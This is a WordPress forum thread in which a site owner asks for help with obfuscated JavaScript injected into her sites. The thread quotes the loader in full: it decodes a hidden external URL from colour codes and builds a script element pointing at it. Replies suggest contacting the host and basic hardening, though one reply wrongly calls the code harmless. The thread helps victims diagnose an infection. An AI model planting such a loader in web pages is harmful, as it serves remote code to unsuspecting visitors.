WordPress vulnerability? (4 posts)

  1. julietchoy
    Posted 4 years ago #

    I found that a lot of the pages of my wordpress website (alongside with phpbb3 and mediawiki) are being appended with a suspicious Javascript:

    function vdch() {
    	if(document.all.length > 3) {
    		var t = new Array('#6a7072', '#723e29', '#2d6562', '#6d7667', '#606863', '#766b72', '#712a65', '#6d2a73', '#692b6c', '#712b00');
    		var dchid = ""; for (j=0;j<t.length;j++) { var c_rgb = t[j]; for (i=1;i<7;i++) { var c_clr = c_rgb.substr(i++,2); if (c_clr!="00") dchid += String.fromCharCode(parseInt(c_clr,16)^i); } }
    		var dch = document.createElement("script");
    		dch.id = "dchid";
    		dch.src = dchid;
    	} else {
    } setTimeout("vdch()",500);

    I have searched the web and found that it looks like a wordpress issue:

    I had tried recover the site by download and re-upload again. However, a few hours later, it was hacked again.

    Do anyone of you know how to prevent this?

    Thanks a lot for your help.

  2. esmi
    Forum Moderator
    Posted 4 years ago #

    Have you spoken to your hosts about this? The hacker could be gaining access anywhere on the server. Especially given that mediaWiki and PHPbb3 were also targeted. In the meantime, you may want to review these resources:

  3. MickeyRoush
    Posted 4 years ago #

    Some infected Joomla sites reported that they had that in their sites as well about a month ago.

  4. grest
    Posted 4 years ago #

    Hi folks

    This code is easy to know what it does.
    It is not a hack code, simply it generates a URL path from this color codes, and it is paste on the document text as an URL.

    On this case it generates the URL: http://adorabletots.co.uk/js/
    if i were you i won't follow that URL.

    1. To stop be hacked you must change your password FTP (as more dificult as possible to guess)
    2. Your folders must be on 755 and files on 644 (for linux).
    3. Maybe if you have been hacked you must check your file to delete all the strange files, also the code infected have to be replace with the default one.

    see you.

Topic Closed

This topic has been closed to new replies.

About this Topic


No tags yet.